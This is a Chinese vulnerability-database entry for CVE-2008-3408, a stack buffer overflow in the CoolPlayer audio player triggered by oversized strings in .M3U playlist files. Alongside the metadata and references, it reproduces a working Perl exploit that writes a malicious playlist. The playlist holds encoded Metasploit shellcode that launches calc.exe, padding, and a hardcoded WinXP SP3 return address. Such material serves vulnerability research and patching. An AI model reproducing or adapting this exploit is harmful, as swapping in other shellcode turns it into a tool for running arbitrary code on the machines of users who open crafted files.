CoolPlayer M3U文件处理栈缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115783 漏洞类型 缓冲区溢出
发布时间 2008-07-29 更新时间 2009-01-29
CVE编号 CVE-2008-3408 CNNVD-ID CNNVD-200807-498
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/6157
https://cxsecurity.com/issue/WLB-2011010114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-498
|漏洞详情
CoolPlayer是一款开放源码的音频播放器。CoolPlayer在处理畸形.M3U文件时存在基于栈的缓冲区溢出漏洞。如果用户受骗加载了包含有超过260字节字符串的.M3U文件的话,就可以触发这个溢出,导致执行任意指令。
|漏洞EXP
#!/usr/bin/perl
# k`sOSe - 07/29/2008

use warnings;
use strict;

# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" .
		"\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" .
		"\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" .
		"\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" .
		"\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" .
		"\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" .
		"\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" .
		"\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" .
		"\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" .
		"\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" . 
		"\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" .
		"\x1e\x28\x44\xd4";

print	$shellcode	.
	"\x41" x (218 - length($shellcode)) .
	"\x32\x4c\x3c\x7e" ; # call ebx  user32.dll  winxp sp3

# milw0rm.com [2008-07-29]
|参考资料

来源:XF
名称:coolplayer-m3u-bo(44103)
链接:http://xforce.iss.net/xforce/xfdb/44103
来源:BID
名称:30418
链接:http://www.securityfocus.com/bid/30418
来源:MILW0RM
名称:6157
链接:http://www.milw0rm.com/exploits/6157
来源:VUPEN
名称:ADV-2008-2264
链接:http://www.frsirt.com/english/advisories/2008/2264/references
来源:SREASON
名称:4088
链接:http://securityreason.com/securityalert/4088
来源:SECUNIA
名称:31294
链接:http://secunia.com/advisories/31294